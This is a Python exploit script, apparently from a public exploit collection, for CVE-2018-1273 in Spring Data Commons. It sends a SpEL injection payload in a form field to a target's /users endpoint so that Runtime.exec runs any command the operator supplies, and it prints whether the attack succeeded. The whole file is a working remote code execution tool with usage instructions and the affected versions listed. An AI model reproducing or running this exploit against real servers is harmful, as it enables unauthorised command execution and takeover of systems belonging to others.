!/usr/bin/python3¶

-- coding:utf-8 --¶

author:zhzyker¶

from:https://github.com/zhzyker/exphub¶

telegram:t.me/zhzyker¶

import requests import sys

if len(sys.argv)!=3: print('+----------------------------------------------------------------------------+') print('+ DES: by zhzyker as https://github.com/zhzyker/exphub +') print('+ Spring Data Commons Remote Code Execution (No display)   +') print('+----------------------------------------------------------------------------+') print('+ USE: python3 cve-2018-1273_cmd.py "" +') print('+ EXP: python3 cve-2018-1273_cmd.py http://1.1.1.1:8080 "touch /tmp/exphub" +') print('+ VER: Spring Data Commons 1.13 to 1.13.10 +') print('+ Spring Data Commons 2.0 to 2.0.5 +') print('+----------------------------------------------------------------------------+') sys.exit()

url = sys.argv[1] cmd = sys.argv[2] vuln = url + "/users"

headers = { 'Host': "localhost:8080", 'Connection': "keep-alive", 'Content-Length': "120", 'Pragma': "no-cache", 'Cache-Control': "no-cache", 'Origin': "http://localhost:8080", 'Upgrade-Insecure-Requests': "1", 'Content-Type': "application/x-www-form-urlencoded", 'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36", 'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8", 'Referer': "http://localhost:8080/users?page=0&size=5", 'Accept-Encoding': "gzip, deflate, br", 'Accept-Language': "zh-CN,zh;q=0.9,en;q=0.8" }

payload = "username[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('%s')]=&password=&repeatedPassword=" % cmd

try: r = requests.post(vuln, data=payload, headers=headers) if r.status_code == 500: print ("[+] Code executed successfully") else: print ("[-] Target Not CVE-2018-1273 Vuln, Good Luck") except: print ("[-] Target Not CVE-2018-1273 Vuln, Good Luck")